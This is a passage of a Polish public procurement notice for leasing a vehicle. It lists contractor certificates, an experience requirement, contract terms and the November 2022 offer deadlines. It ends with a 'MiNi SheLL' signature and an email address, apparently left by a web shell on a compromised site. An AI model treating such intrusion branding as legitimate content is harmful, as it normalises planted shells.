lub inny dokument<br/>potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi<br/>odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych<br/>płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>e) Zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków,<br/>wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca<br/>zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub<br/>grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub<br/>wstrzymanie w całości wykonania decyzji właściwego organ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej usługi, której przedmiotem była/jest dostawa pojazdu w formie leasingu, jak stanowiący przedmiot zamówienia lub podobnych, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których dostawy zostały wykonane o wartości minimum 300 000,00 zł brutto w ramach jednego postępowania przetargowego – poświadczone referencjami. W przypadku wskazania usługi wykonywanej (trwającej), należy wskazać zakres i wartość usługi faktycznie zrealizowaną w celu potwierdzenie spełnienia warunku. Zamawiający nie dopuszcza aby wykaz dotyczył usług wykonanych, a przypadku świadczeń okresowych lub ciągłych – również wykonywanych, w okresie dłuższym niż 3 lata przed upływem terminu składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-24 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – zgodnie z treścią załącznika nr 8 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com